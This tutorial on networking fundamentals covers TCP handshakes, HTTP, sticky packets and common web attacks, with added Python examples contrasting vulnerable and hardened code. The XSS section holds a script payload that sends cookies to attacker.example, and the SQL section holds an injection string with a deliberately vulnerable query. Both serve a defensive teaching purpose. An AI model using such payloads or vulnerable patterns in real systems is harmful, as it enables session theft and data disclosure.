2025-01-19 update. From: SLTechnology News&Howtos > Development
Shulou (Shulou.com) 06/03 report
This article explains the networking fundamentals a programmer needs to know. The explanation is kept simple and clear and is easy to follow; let's study what those fundamentals are.
In interviews I am often asked about computer networking, so I have written this post to summarise the basic points of computer networking and the topics that come up most often in interviews. If you find errors, please point them out; anything you would like added can be sent by private message, and I will add material from time to time. Without further ado, straight to the subject:
1. OSI network architecture and TCP/IP protocol architecture
The OSI reference model has seven layers:
From bottom to top: physical layer, data link layer, network layer, transport layer, session layer, presentation layer and application layer.
The TCP/IP protocol architecture has four layers:
From bottom to top: network interface layer, internet layer, transport layer and application layer.
The network interface layer corresponds to the OSI physical and data link layers, the internet layer to the OSI network layer, the transport layers correspond directly, and the TCP/IP application layer covers the OSI session, presentation and application layers.
2. HTTP and HTTPS protocols
HTTP runs over TCP and transmits in plaintext; client and server cannot verify each other's identity. HTTPS is HTTP wrapped in an SSL/TLS (Secure Sockets Layer / Transport Layer Security) shell: HTTP runs over TLS and TLS runs over TCP, which gives HTTP encryption, integrity protection and authentication. (SSL 2.0 and 3.0 are obsolete and disabled in modern software; what is actually negotiated today is TLS 1.2 or 1.3, but the name "SSL" survives.) The two differ as follows:
Different ports: HTTP and HTTPS use different connection setups and different default ports, 80 for HTTP and 443 for HTTPS.
Resource consumption: because of the handshake and the encryption and decryption of every message, HTTPS uses more CPU and memory than HTTP.
Cost: HTTPS needs a certificate, which must be issued by a certificate authority (CA); commercial CAs charge for certificates, although free CAs such as Let's Encrypt exist.
The encryption mechanism of HTTPS is hybrid: public-key (asymmetric) cryptography is used during the handshake to authenticate the server and agree on a session key, and that shared session key is then used for symmetric encryption of the actual traffic.
HTTP protocol format
HTTP request (partial capture)
GET /user HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
...
Part I: request line: request method, resource path and HTTP version (first line above)
Part II: request headers: immediately after the request line, describing additional information the server needs (lines 2 to 8)
Part III: blank line (an empty line, CRLF, must separate the headers from the body)
Part IV: body: for GET normally empty; for POST it carries the form data or other payload, whose end is determined by Content-Length or chunked transfer encoding
HTTP response
HTTP/1.1 200
Content-Type:text/html

OK
Part I: status line: HTTP version, status code and reason phrase (first line; the reason phrase is optional and is omitted by some servers, as in this capture)
Part II: response headers, describing additional information the client needs (second line)
Part III: blank line (third line)
Part IV: response body (line 4)
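The four-part layout above, as an added example that is not part of the original article: a small Python parser that splits a raw HTTP/1.1 request into request line, headers, blank line and body. The request bytes (SAMPLE_REQUEST) are constructed for the example. The parser finds the end of the body by Content-Length, which is the part most often got wrong: on a keep-alive connection the next request may already be in the buffer and must not be read as body, and a second Content-Length header is refused rather than silently picked.

```python
# Added example, not from the original article. Parses one HTTP/1.1 request
# from raw bytes into its four parts. SAMPLE_REQUEST is constructed here.
from typing import Dict, Tuple

# Constructed sample: a POST with a body, followed on the same keep-alive
# connection by the start of a second request.
SAMPLE_REQUEST = (
    b"POST /user HTTP/1.1\r\n"                               # part I: request line
    b"Host: localhost:8080\r\n"                              # part II: headers
    b"Connection: keep-alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 10\r\n"
    b"\r\n"                                                  # part III: blank line
    b"name=alice"                                            # part IV: body (10 bytes)
    b"GET /next HTTP/1.1\r\nHost: localhost:8080\r\n\r\n"    # next request, not body
)


def parse_request(raw: bytes) -> Tuple[str, str, str, Dict[str, str], bytes, bytes]:
    """Return (method, target, version, headers, body, remainder) for one request."""
    head, sep, remainder = raw.partition(b"\r\n\r\n")  # the blank line ends the headers
    if not sep:
        raise ValueError("incomplete request: header block not terminated")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, version = parts

    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name or name != name.strip():
            # RFC 7230: no whitespace between field name and colon; reject it
            raise ValueError(f"malformed header line: {line!r}")
        key = name.lower()
        if key == "content-length" and key in headers:
            # two Content-Length headers is the classic request-smuggling lever
            raise ValueError("duplicate Content-Length")
        headers[key] = (headers[key] + ", " + value.strip()) if key in headers else value.strip()

    length_str = headers.get("content-length", "0")
    if not length_str.isdigit():
        raise ValueError(f"invalid Content-Length: {length_str!r}")
    length = int(length_str)
    body, rest = remainder[:length], remainder[length:]
    if len(body) < length:
        raise ValueError("incomplete request: body shorter than Content-Length")
    return method, target, version, headers, body, rest
```

Calling parse_request(SAMPLE_REQUEST) yields the POST with body b"name=alice" and returns the bytes of the second request untouched, so the caller can parse them as the next message. Chunked transfer encoding is not handled here; a real server must parse it too, and must reject messages that carry both Content-Length and Transfer-Encoding.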
3. TCP protocol and UDP protocol
TCP is a transport-layer protocol that provides a connection-oriented, end-to-end, reliable byte-stream service: data arrives in order, lost segments are retransmitted, and flow and congestion control are applied.
UDP is a transport-layer protocol that establishes no connection before sending; it offers no guarantee of delivery or ordering, but has very little overhead and is therefore fast.
4. TCP three-way handshake and four-way close (the four "waves")
First wave: the client sends a connection-release segment and stops sending data. The FIN flag in the segment header is set (FIN=1) and its sequence number is seq=u (the sequence number of the last byte previously sent plus 1); the client enters the FIN-WAIT-1 state. TCP specifies that a FIN segment consumes one sequence number even when it carries no data.
Second wave: the server receives the release segment and replies with an acknowledgement, ACK=1, ack=u+1, carrying its own sequence number seq=v; the server enters the CLOSE-WAIT state. TCP on the server notifies the application process that the client-to-server direction has been released, and the connection is now half-closed: the client has no more data to send, but if the server sends data the client must still accept it. This half-closed condition lasts for the whole CLOSE-WAIT state. When the client receives the server's acknowledgement it enters FIN-WAIT-2 and waits for the server's own release segment (before that it must still receive any final data the server sends).
Third wave: after sending its final data, the server sends its own release segment, FIN=1, ack=u+1. Because the server was half-closed it may have sent more data in the meantime, so its sequence number is now seq=w. The server enters the LAST-ACK state and waits for the client's acknowledgement.
Fourth wave: on receiving the server's release segment the client must acknowledge it, ACK=1, ack=w+1, with sequence number seq=u+1, and enters the TIME-WAIT state. Note that the connection is not released yet: only after 2*MSL (twice the Maximum Segment Lifetime) does the client release the corresponding TCB (Transmission Control Block) and enter CLOSED. The server enters CLOSED as soon as it receives the client's acknowledgement and likewise releases its TCB, so the server finishes the connection earlier than the client.
4.1 Why three segments to open a connection but four to close it?
When the server receives the client's SYN it can answer with a single SYN+ACK segment: the ACK part acknowledges the client's SYN and the SYN part synchronises the server's own sequence number. When closing, however, the server that receives a FIN usually cannot close its socket straight away, so it can only reply with an ACK first, telling the client "I received your FIN". Only when everything the server still has to send has been sent can it send its own FIN, so the ACK and the FIN cannot be merged into one segment and four segments are needed. (If the server has nothing left to send it may combine its ACK and FIN, which is why a three-segment close is sometimes seen in captures.)
4.2 Why must TIME_WAIT last 2MSL (twice the Maximum Segment Lifetime) before returning to CLOSED?
In principle, once all four segments have been sent we could enter CLOSED directly, but we must assume the network is unreliable and the last ACK may be lost. TIME_WAIT therefore exists to resend an ACK that may have been lost. The client sends the last ACK, but it may not arrive; if the server does not receive it, the server retransmits its FIN. So the client cannot close immediately; it must make sure the server received the ACK. After sending the ACK the client enters TIME_WAIT and starts a timer of 2MSL. If another FIN arrives within that time, the client resends the ACK and restarts the 2MSL timer. 2MSL is twice the MSL, the maximum time a segment can survive in the network, so 2MSL is the longest a send and its reply can take. If no further FIN arrives before the 2MSL timer expires, the client concludes that the ACK was received and ends the TCP connection.
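The four waves above and the TIME_WAIT reasoning in 4.2, as an added example that is not part of the original article: a Python simulation of the close sequence with the same sequence numbers u, v and w. Segments are plain objects and "the network" is whatever the driver chooses to deliver, so losing the final ACK is modelled by not delivering it and letting the server retransmit its FIN. The MSL value is an assumption chosen for the example.

```python
# Added example, not from the original article: a simulation of the four-way
# close with the sequence numbers u, v and w used in the text. Segment loss
# is modelled by simply not delivering a segment. MSL is an assumed value.
from dataclasses import dataclass
from typing import Dict, List, Optional

MSL = 30  # seconds (assumed; real stacks use values from 30 s to 2 min)


@dataclass
class Segment:
    src: str
    seq: int
    ack: int = 0
    FIN: bool = False
    ACK: bool = False
    data_len: int = 0


@dataclass
class Endpoint:
    name: str
    snd_nxt: int          # next sequence number this side will use
    rcv_nxt: int          # next sequence number expected from the peer
    state: str = "ESTABLISHED"
    timer: int = 0        # seconds left in TIME_WAIT

    def _seg(self, **flags) -> Segment:
        return Segment(self.name, seq=self.snd_nxt, ack=self.rcv_nxt, ACK=True, **flags)

    def send_data(self, nbytes: int) -> Segment:
        seg = self._seg(data_len=nbytes)
        self.snd_nxt += nbytes
        return seg

    def close(self) -> Segment:
        """Send FIN: active close goes to FIN_WAIT_1, passive close (from CLOSE_WAIT) to LAST_ACK."""
        seg = self._seg(FIN=True)
        self.snd_nxt += 1                      # a FIN consumes one sequence number
        self.state = "LAST_ACK" if self.state == "CLOSE_WAIT" else "FIN_WAIT_1"
        return seg

    def receive(self, seg: Segment) -> List[Segment]:
        """Process one segment; return the segments sent in response."""
        if seg.ACK and seg.ack == self.snd_nxt:   # our FIN has been acknowledged
            if self.state == "FIN_WAIT_1":
                self.state = "FIN_WAIT_2"
            elif self.state == "LAST_ACK":
                self.state = "CLOSED"
                return []
        if not (seg.data_len or seg.FIN):
            return []                          # pure ACK: nothing to acknowledge
        self.rcv_nxt = seg.seq + seg.data_len + (1 if seg.FIN else 0)
        if seg.FIN:
            if self.state == "ESTABLISHED":
                self.state = "CLOSE_WAIT"      # half-closed: we may still send
            elif self.state in ("FIN_WAIT_2", "TIME_WAIT"):
                self.state = "TIME_WAIT"       # (re)start the 2*MSL timer
                self.timer = 2 * MSL
        return [self._seg()]                   # acknowledge data and/or FIN

    def tick(self, seconds: int) -> None:
        if self.state == "TIME_WAIT":
            self.timer -= seconds
            if self.timer <= 0:
                self.state = "CLOSED"


def run_close(u: int, v: int, server_data: int, lose_final_ack: bool) -> Dict[str, object]:
    """Drive the four waves; optionally drop the final ACK so the server retransmits its FIN."""
    client = Endpoint("client", snd_nxt=u, rcv_nxt=v)
    server = Endpoint("server", snd_nxt=v, rcv_nxt=u)
    trace: List[str] = []

    def deliver(seg: Segment, to: Endpoint) -> List[Segment]:
        trace.append(f"{seg.src}->{to.name} seq={seg.seq} ack={seg.ack}"
                     f"{' FIN' if seg.FIN else ''}{' data=%d' % seg.data_len if seg.data_len else ''}")
        return to.receive(seg)

    fin1 = client.close()                                   # wave 1: FIN, seq=u
    (ack1,) = deliver(fin1, server)                         # wave 2: ACK, ack=u+1, seq=v
    deliver(ack1, client)                                   # client -> FIN_WAIT_2
    if server_data:                                         # half-closed: server still sends
        for a in deliver(server.send_data(server_data), client):
            deliver(a, server)
    fin2 = server.close()                                   # wave 3: FIN, seq=w, ack=u+1
    (ack2,) = deliver(fin2, client)                         # wave 4: ACK, ack=w+1, seq=u+1
    state_after_wave4 = client.state
    timer_before_reack: Optional[int] = None
    if lose_final_ack:
        trace.append("network drops client's final ACK")
        client.tick(MSL)                                    # time passes, server times out
        timer_before_reack = client.timer
        resent = Segment("server", seq=fin2.seq, ack=fin2.ack, FIN=True, ACK=True)
        (ack2,) = deliver(resent, client)                   # client re-ACKs, timer restarts
    timer_after_final_ack = client.timer
    deliver(ack2, server)                                   # server -> CLOSED
    client.tick(2 * MSL)                                    # TIME_WAIT expires
    return {"w": fin2.seq, "final_ack": ack2.ack, "final_seq": ack2.seq,
            "client_after_wave4": state_after_wave4, "timer_before_reack": timer_before_reack,
            "timer_after_final_ack": timer_after_final_ack,
            "server_state": server.state, "client_state": client.state, "trace": trace}
```

run_close(100, 500, 20, False) shows the normal case: w = 520 because the server sent 20 more bytes while half-closed, the final ACK carries ack=521 and seq=101, the server is CLOSED immediately and the client only after 2*MSL. With lose_final_ack=True the retransmitted FIN finds the client still in TIME_WAIT, which re-acknowledges it and restarts its timer; had the client gone to CLOSED at once, the retransmitted FIN would have been answered with a RST and the server would never have closed cleanly.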
4.3 Why three handshakes rather than two or four?
The three-way handshake does two things: it makes both sides ready to send data (each side knows the other is ready), and it lets both sides choose and confirm their initial sequence numbers, which are sent and acknowledged during the handshake.
Suppose it were reduced to two messages. If the second message (the server's SYN+ACK) does not reach the client, the server considers the connection established and starts sending data, while the client, having received nothing, considers the connection not yet established and keeps sending connection requests. The two sides deadlock on the state of the connection and the server's resources are tied up; a stale, delayed SYN arriving at the server would likewise open a connection that the client knows nothing about.
As for four: after three messages both sides have confirmed the preceding exchange, but neither side can ever be sure that its latest message was received, and no finite number of extra messages removes that uncertainty (the two generals problem). A perfectly reliable agreement protocol does not exist, so adding a fourth message gains nothing.
4.4 What if a connection has been established and the client suddenly fails?
TCP has a keepalive timer for this; obviously the server cannot wait forever for a failed client and waste resources. The server resets the timer every time it receives data from the client. The interval is usually 2 hours: if nothing arrives from the client within 2 hours the server sends a probe segment, and then another every 75 seconds. If 10 consecutive probes get no response, the server concludes that the client has failed and closes the connection. Keepalive is off by default and must be enabled per socket (SO_KEEPALIVE); on Linux the defaults are tunable through net.ipv4.tcp_keepalive_time (7200 s), net.ipv4.tcp_keepalive_intvl (75 s) and net.ipv4.tcp_keepalive_probes (9).
5. What are the common network protocols?
Network layer
IP: Internet Protocol
ICMP: Internet Control Message Protocol
ARP: Address Resolution Protocol (maps IP addresses to link-layer addresses; it sits at the boundary between the link and network layers)
RARP: Reverse Address Resolution Protocol (the inverse mapping; obsolete, replaced by BOOTP/DHCP)
Transport layer
UDP: User Datagram Protocol
TCP: Transmission Control Protocol
Application layer
FTP: File Transfer Protocol
Telnet: remote login protocol
DNS: Domain Name System (name resolution)
POP3: Post Office Protocol version 3
HTTP: Hypertext Transfer Protocol
SMTP: Simple Mail Transfer Protocol
SNMP: Simple Network Management Protocol
TFTP: Trivial File Transfer Protocol
6. What are the common network attacks, and how are they prevented?
6.1 DDoS
DDoS attack
DDoS stands for Distributed Denial of Service: a large number of distributed machines (usually compromised hosts controlled as a botnet, not legitimate servers) send requests to the target simultaneously, so that normal legitimate users cannot obtain service.
A common form is the TCP SYN flood:
The client sends a connection request (SYN) to the server
The server replies with SYN+ACK and allocates state for the half-open connection
The client never sends the final ACK, so the server keeps waiting for it; enough such half-open connections fill the server's connection queue and new legitimate connections are refused. The source addresses are usually spoofed, so the SYN+ACKs go to hosts that never asked for them.
DDoS prevention
Limit the number of SYN half-open connections open at the same time
Shorten the timeout of SYN half-open connections
Turn off unnecessary services
Enable SYN cookies, so the server allocates no state until the third handshake segment arrives (net.ipv4.tcp_syncookies on Linux)
For volumetric floods, filter upstream (at the ISP or a scrubbing service), since a single host cannot absorb more traffic than its link carries
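The half-open connection pattern described above, as an added example that is not part of the original article: a Python detector that replays a list of handshake segments against a server-side connection table and reports which entries never completed the third step. The segment list (SAMPLE_SEGMENTS) and the addresses in it are constructed for the example.

```python
# Added example, not from the original article: spot a SYN flood by replaying
# handshake segments and counting connections stuck in SYN_RECEIVED.
from collections import Counter
from typing import Dict, List, Tuple

# Constructed sample: (source, destination, flags). 203.0.113.5 completes its
# handshake; 198.51.100.7 sends 50 SYNs and never answers the SYN-ACKs.
SAMPLE_SEGMENTS: List[Tuple[str, str, str]] = [
    ("203.0.113.5:4000", "10.0.0.1:80", "SYN"),
    ("10.0.0.1:80", "203.0.113.5:4000", "SYN-ACK"),
    ("203.0.113.5:4000", "10.0.0.1:80", "ACK"),
] + [
    seg
    for port in range(5000, 5050)
    for seg in (
        (f"198.51.100.7:{port}", "10.0.0.1:80", "SYN"),
        ("10.0.0.1:80", f"198.51.100.7:{port}", "SYN-ACK"),
    )
]


def half_open_connections(segments: List[Tuple[str, str, str]]) -> List[str]:
    """Replay segments against a server-side table; return clients still in SYN_RECEIVED."""
    table: Dict[Tuple[str, str], str] = {}
    for src, dst, flags in segments:
        if flags == "SYN":
            table[(src, dst)] = "SYN_RECEIVED"      # the server allocates state here
        elif flags == "ACK" and table.get((src, dst)) == "SYN_RECEIVED":
            table[(src, dst)] = "ESTABLISHED"       # third handshake segment arrived
        # SYN-ACK is the server's own reply and changes nothing in the table
    return [client for (client, _), state in table.items() if state == "SYN_RECEIVED"]


def backlog_exhausted(segments: List[Tuple[str, str, str]], backlog: int = 128) -> bool:
    """True when the half-open entries would fill a listen backlog of the given size."""
    return len(half_open_connections(segments)) >= backlog


def syn_flood_sources(segments: List[Tuple[str, str, str]], per_source_threshold: int = 20) -> List[str]:
    """Source IPs with at least per_source_threshold half-open connections."""
    counts = Counter(client.rsplit(":", 1)[0] for client in half_open_connections(segments))
    return sorted(ip for ip, n in counts.items() if n >= per_source_threshold)
```

Per-source counting identifies a clumsy attacker, but a real flood spoofs its source addresses, so the count that matters operationally is the total number of half-open entries against the listen backlog (backlog_exhausted), which is exactly the exhaustion SYN cookies prevent by allocating no table entry until the ACK arrives.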
6.2 SQL injection
SQL injection
Instead of submitting ordinary data in a text box or other input field, the attacker enters SQL fragments; if the application concatenates that input into a query, the fragments become part of the statement and trick the application into disclosing or modifying its data.
Preventive measures for SQL injection
Do not build SQL dynamically from user input; use parameterised queries (prepared statements) or an ORM that does so
Do not keep sensitive data in plaintext (hash passwords, encrypt secrets), so that a successful injection leaks less
Restrict database permissions and privileges: the application's account should not own the schema or have file or OS access
Do not show database errors directly to the user; they reveal table and column names to an attacker
Put a Web Application Firewall (WAF) in front of web applications that access the database, as a secondary layer rather than the primary defence
Periodically test web applications that interact with the database
Keep the database patched to the latest available version
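The difference between dynamic SQL and a parameterised query, as an added example that is not part of the original article: the same lookup written both ways against an in-memory SQLite database built here with constructed rows. The classic payload `' OR '1'='1` turns the concatenated query into one that matches every row, while the parameterised version treats the payload as a literal name that matches nothing.

```python
# Added example, not from the original article. Vulnerable and safe versions
# of the same user lookup, run against a constructed in-memory SQLite database.
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample database with three users (passwords stored only as hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (name, password_hash) VALUES (?, ?)",
                     [("alice", "h1"), ("bob", "h2"), ("carol", "h3")])
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, name: str) -> List[str]:
    # Dynamic SQL: the user-supplied string becomes part of the statement text,
    # so quotes in it change the query's structure.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn: sqlite3.Connection, name: str) -> List[str]:
    # Parameterised query: the statement text is fixed; the driver binds the value
    # separately, so the input can only ever be compared as data.
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE name = ?", (name,))]


INJECTION_PAYLOAD = "' OR '1'='1"   # closes the quote, adds an always-true condition
```

The vulnerable query sent to the database is `SELECT name FROM users WHERE name = '' OR '1'='1'`, which returns every user; the safe version asks for a user literally named `' OR '1'='1` and gets an empty result. An application account that can only SELECT from this table (least privilege, as recommended above) would limit the damage even of the vulnerable version.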
6.3 XSS attack
XSS attack
XSS (Cross-Site Scripting) is a common vulnerability in web applications. An attacker injects malicious script into a vulnerable website or web application; when the page loads, the script runs in the victim's browser with the page's origin, where it can read cookies, forge requests or rewrite the page.
XSS prevention
Escape or filter the data entered wherever the web page accepts user input. Also escape the output when the backend renders a page, because an attacker may get malicious script into the database by other routes; the output encoding must match the context (HTML body, attribute, JavaScript, URL) into which the data is inserted.
On the front end, validate the places where HTML tag attributes and CSS properties are assigned from data, in particular URLs placed into href or src and anything placed into event handlers.
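Context-aware output encoding as described above, as an added example that is not part of the original article: a Python rendering helper with the vulnerable version beside the hardened one, using the standard library's html.escape. The payload string and the attacker host in it are constructed for the example. It also shows the attribute case the last bullet points at: a URL in href needs a scheme allow-list in addition to escaping, because a `javascript:` URL contains no characters that escaping would touch.

```python
# Added example, not from the original article. Vulnerable and hardened
# rendering of user-controlled text in HTML body and attribute contexts.
import html

# Constructed payload: exfiltrates the cookie to an attacker-controlled host.
PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user text is inserted into the HTML body verbatim.
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    # HTML-body context: escape &, <, >, " and ' so the text can never open a tag.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_link_safe(url: str, label: str) -> str:
    # Attribute context holding a URL: escaping is necessary but not sufficient,
    # because "javascript:alert(1)" survives escaping untouched. Allow-list the scheme.
    cleaned = url.strip()
    if not cleaned.lower().startswith(("http://", "https://")):
        cleaned = "#"
    return f'<a href="{html.escape(cleaned, quote=True)}">{html.escape(label, quote=True)}</a>'
```

render_comment_unsafe(PAYLOAD) returns a page fragment containing a live script element; render_comment_safe(PAYLOAD) returns the same text with every angle bracket turned into `&lt;` and `&gt;`, which the browser displays but does not execute. Escaping is done at output time, per context, rather than only at input time, for the reason given above: data can reach the database by other routes.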
6.4 CSRF attack
CSRF attack
Cross-site request forgery (CSRF) is an attack in which the attacker hijacks the user's browser into performing unintended operations on a web application the user is currently logged in to; it works because the browser attaches the user's cookies to the forged request automatically.
CSRF prevention
Check the Referer field
The HTTP Referer header indicates the address a request came from. When handling a request that touches sensitive data, the Referer should normally be under the same domain as the requested address. For example, for a transfer on www.examplebank.com, the Referer should be the page that holds the transfer button, which is also under www.examplebank.com. A request forged by CSRF comes from the page containing the malicious URL, whose Referer is not under www.examplebank.com, so the server can recognise the malicious access. Two caveats: browsers and proxies may strip the Referer, so a missing header must be handled by an explicit policy, and the check must compare the host name exactly rather than look for the domain as a substring. Modern applications complement this with the Origin header and SameSite cookie attributes.
Add a check token
Since the essence of CSRF is that the attacker tricks the user's browser into visiting an address of the attacker's choosing, the attack fails if the browser is required to supply, when accessing sensitive data, a value that is not stored in a cookie and cannot be forged. This value is usually a form field: the server generates a pseudo-random token, keeps it in the server-side session and embeds it in the form; when the client submits the form, the token is submitted with it and verified. A normal client obtains and returns the token correctly, but a CSRF request sent from the attacker's page does not know the token in advance, so the server rejects the suspicious request because the token is missing or wrong. The token must come from a cryptographic random source and be compared in constant time.
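The two checks above, as an added example that is not part of the original article: Python functions for issuing and verifying a per-session CSRF token and for checking the Referer against an exact host name. The session is modelled as a plain dict and www.examplebank.com is taken from the text; the bypass URLs in the usage note are constructed for the example.

```python
# Added example, not from the original article: CSRF token issue/verify and
# a Referer check that compares the parsed host name, not a substring.
import hmac
import secrets
from typing import Dict, Optional
from urllib.parse import urlparse


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Generate an unguessable token, keep it in the server-side session, return it for the form."""
    token = secrets.token_urlsafe(32)         # 256 bits from the OS CSPRNG
    session["csrf_token"] = token
    return token


def csrf_token_ok(session: Dict[str, str], submitted: Optional[str]) -> bool:
    """True only if the submitted form field matches the session's token."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False                          # no token issued, or none submitted
    return hmac.compare_digest(expected, submitted)   # constant-time comparison


def referer_ok(headers: Dict[str, str], allowed_host: str = "www.examplebank.com") -> bool:
    """Accept only if the Referer parses to exactly allowed_host over https."""
    referer = headers.get("Referer")
    if referer is None:
        return False     # policy choice: a stripped Referer is rejected for sensitive actions
    parsed = urlparse(referer)
    return parsed.scheme == "https" and parsed.hostname == allowed_host
```

Parsing the host name is what defeats the usual substring tricks: `https://www.examplebank.com.evil.example/`, `https://evil.example/www.examplebank.com` and `https://www.examplebank.com@evil.example/` all contain the bank's name yet resolve to a different host. The token check is the primary control; the Referer check is a supplementary one, since some clients legitimately send no Referer.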
7. The "sticky packet" problem of the TCP protocol
TCP is a connection-oriented, stream-oriented reliable protocol: it delivers a byte stream and preserves no message boundaries. To send many small writes more efficiently, the sender may apply an optimisation (the Nagle algorithm) that merges data written at short intervals into one larger block before sending it. The receiver then cannot tell where one application message ends and the next begins; this is the so-called sticky packet problem.
Causes of sticky packets:
(1) The sender waits for its buffer to fill before sending (data written at very short intervals and in very small pieces is coalesced into one segment).
(2) The receiver does not drain its buffer in time, so one read returns several messages, or part of one (the client sends a message, the server reads only part of it, and the rest is returned by the next read glued to the following message).
Solutions:
(1) Fixed-length transmission
Every message is sent in a fixed length, split into fixed-size units regardless of its size. The drawback is that the last unit usually has to be padded, and the receiver may not be able to tell the padding from real data.
(2) A delimiter at the end
Append a special marker to the end of each message; when the receiver reads the marker, the message is complete. The drawback is choosing a marker that can never appear in the data, or else having to escape it.
(3) A length field in the header
Put the message length in a header; the receiver reads the header first and then exactly that many bytes, so it never has to guess where the message boundary lies. The receiver should bound the length it is willing to accept, otherwise a peer can make it allocate arbitrarily large buffers.
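Solution (3) above, as an added example that is not part of the original article: a Python encoder and an incremental decoder for length-prefixed frames. The decoder is fed arbitrary byte chunks, the way recv() returns them, so it copes with both causes listed above (several messages in one read, one message split across reads) and enforces a maximum frame size. The 4-byte big-endian header and the 1 MiB limit (MAX_FRAME) are assumptions for the example.

```python
# Added example, not from the original article: length-prefixed framing that
# reassembles application messages from an arbitrary sequence of byte chunks.
import struct
from typing import List

HEADER = struct.Struct("!I")   # 4-byte big-endian length prefix (assumed format)
MAX_FRAME = 1 << 20            # assumed upper bound (1 MiB); reject anything larger


def encode_frame(payload: bytes) -> bytes:
    """Prefix one application message with its length."""
    if len(payload) > MAX_FRAME:
        raise ValueError("payload too large")
    return HEADER.pack(len(payload)) + payload


class FrameDecoder:
    """Reassembles length-prefixed messages from whatever chunks the socket delivers."""

    def __init__(self) -> None:
        self.buf = bytearray()

    def feed(self, chunk: bytes) -> List[bytes]:
        """Append a chunk; return every complete message now available (possibly none)."""
        self.buf += chunk
        frames: List[bytes] = []
        while len(self.buf) >= HEADER.size:
            (length,) = HEADER.unpack_from(self.buf)
            if length > MAX_FRAME:
                # bound the allocation before trusting the peer's length
                raise ValueError(f"frame length {length} exceeds MAX_FRAME")
            end = HEADER.size + length
            if len(self.buf) < end:
                break                          # partial frame: wait for more bytes
            frames.append(bytes(self.buf[HEADER.size:end]))
            del self.buf[:end]                 # keep any bytes of the next frame
        return frames


def decode_stream(data: bytes, chunk_size: int) -> List[bytes]:
    """Feed data to a decoder in fixed-size chunks, simulating how recv() may return it."""
    decoder = FrameDecoder()
    out: List[bytes] = []
    for i in range(0, len(data), chunk_size):
        out.extend(decoder.feed(data[i:i + chunk_size]))
    return out
```

decode_stream(stream, 1), decode_stream(stream, 3) and decode_stream(stream, len(stream)) all yield the same message list, which is the property the text asks for: the application sees messages, not the segments TCP happened to deliver. A header that announces a length above MAX_FRAME is rejected before any buffer is grown, closing the memory-exhaustion hole a naive decoder leaves open.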
Thank you for reading. The above is the content of "the networking fundamentals a programmer needs to know"; after studying this article you should have a deeper understanding of the topic, and the details still need to be verified in practice. The editor will publish more articles on related topics; you are welcome to follow.